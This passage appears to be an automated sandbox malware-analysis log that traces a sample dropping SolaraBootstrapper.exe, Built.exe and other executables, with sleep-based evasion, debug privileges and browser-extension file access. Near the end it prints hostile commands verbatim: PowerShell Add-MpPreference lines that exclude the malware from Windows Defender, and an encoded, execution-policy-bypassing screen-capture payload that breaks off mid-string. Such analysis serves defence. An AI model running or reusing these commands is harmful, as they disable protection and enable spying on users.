    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -590994s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -590871s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -590748s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -590636s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -590485s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -590360s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -590234s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -589922s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -589791s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -589641s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -589509s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -589384s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -589262s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -589094s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -588964s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -588852s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -588729s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -588617s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -588505s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -588386s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -588268s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -588150s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -588021s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -587880s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -587753s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -587630s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -587509s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -587393s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -587275s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -587168s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -587040s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -586918s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -586798s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -586682s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -586568s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -586443s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -586323s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -586205s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -586088s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -585963s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -585845s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -585730s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -585616s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -585492s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -585374s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -585254s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 4320Thread sleep time: -585133s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7468Thread sleep count: 2297 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8516Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep count: 3287 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8536Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8388Thread sleep count: 38 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472Thread sleep count: 2004 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8532Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8332Thread sleep count: 399 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8728Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8552Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8780Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8580Thread sleep time: -922337203685477s >= -30000s
    Source: C:\agentInto\fontsessionruntime.exe TID: 7796Thread sleep count: 884 > 30
    Source: C:\agentInto\fontsessionruntime.exe TID: 8488Thread sleep count: 237 > 30
    Source: C:\agentInto\fontsessionruntime.exe TID: 7732Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\agentInto\fontsessionruntime.exeFile Volume queried: C:\ FullSizeInformation
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 600000
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599875
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599735
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599607
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599435
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599299
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599130
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599000
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598889
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598767
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598641
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598507
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598297
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598125
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 597922
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 597672
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 597507
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 597339
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 597157
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 596657
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 596485
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 596302
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 596157
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 596000
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 595868
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 595749
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 595579
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 595450
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 595265
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 595110
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 594962
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 594825
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 594592
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 594461
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 594324
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 594195
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 594072
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 593891
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 593742
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 593563
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 593368
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 593211
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 593075
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 592963
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 592843
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 592730
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 592485
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 592219
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 592094
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 591975
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 591853
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 591708
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 591579
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 591454
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 591311
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 591172
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 590994
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 590871
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 590748
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 590636
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 590485
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 590360
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 590234
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 589922
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 589791
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 589641
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 589509
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 589384
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 589262
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 589094
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588964
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588852
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588729
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588617
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588505
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588386
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588268
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588150
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 588021
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 587880
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 587753
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 587630
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 587509
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 587393
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 587275
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 587168
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 587040
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 586918
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 586798
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 586682
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 586568
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 586443
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 586323
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 586205
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 586088
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 585963
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 585845
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 585730
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 585616
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 585492
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 585374
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 585254
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 585133
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\agentInto\fontsessionruntime.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeAPI call chain: ExitProcess graph end nodegraph_0-13
    Source: C:\Users\user\AppData\Local\Temp\x12.exeAPI call chain: ExitProcess graph end nodegraph_1-13
    Source: C:\Users\user\AppData\Local\Temp\x11.exeAPI call chain: ExitProcess graph end nodegraph_2-13
    Source: C:\Users\user\AppData\Local\Temp\x10.exeAPI call chain: ExitProcess graph end nodegraph_3-13
    Source: C:\Users\user\AppData\Local\Temp\x9.exeAPI call chain: ExitProcess graph end nodegraph_4-13
    Source: C:\Users\user\AppData\Local\Temp\x8.exeAPI call chain: ExitProcess graph end nodegraph_5-13
    Source: C:\Users\user\AppData\Local\Temp\x7.exeAPI call chain: ExitProcess graph end nodegraph_6-13
    Source: C:\Users\user\AppData\Local\Temp\x6.exeAPI call chain: ExitProcess graph end nodegraph_7-13
    Source: C:\Users\user\AppData\Local\Temp\x5.exeAPI call chain: ExitProcess graph end nodegraph_8-13
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information queried: ProcessInformation
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeCode function: 0_2_00401AE1 GetCommandLineA,GetModuleHandleA,GetProcessHeap,ExitProcess,PathFindFileNameA,0_2_00401AE1
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
    Source: C:\agentInto\fontsessionruntime.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAc